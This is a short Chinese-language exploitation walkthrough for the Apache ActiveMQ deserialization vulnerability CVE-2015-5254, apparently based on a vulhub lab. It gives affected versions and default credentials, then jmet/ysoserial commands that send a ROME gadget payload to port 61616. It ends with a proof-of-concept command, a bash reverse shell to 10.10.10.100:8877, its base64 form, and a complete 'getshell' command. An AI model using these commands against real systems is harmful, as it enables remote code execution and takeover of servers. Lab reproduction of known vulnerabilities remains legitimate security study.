ActiveMQ 反序列化漏洞(CVE-2015-5254)
https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md
影响范围:Apache ActiveMQ 5.13.0之前5.x版本
默认密码:admin/admin
其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161
即可看到web管理页面,不过这个漏洞理论上是不需要web的
漏洞利用过程如下:
- 构造(可以使用ysoserial)可执行命令的序列化对象
- 作为一个消息,发送给目标61616端口
- 访问web管理页面,读取消息,触发漏洞
使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。
jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
执行:
poc
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.225.134 61616
此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://your-ip:8161/admin/browse.jsp?JMSDestination=event
看到这个队列中所有消息:点击即可触发
payload
bash -i >& /dev/tcp/10.10.10.100/8877 0>&1
上面这行base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMDAvODg3NyAwPiYx
getshell-exp
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMDAvODg3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.225.134 61616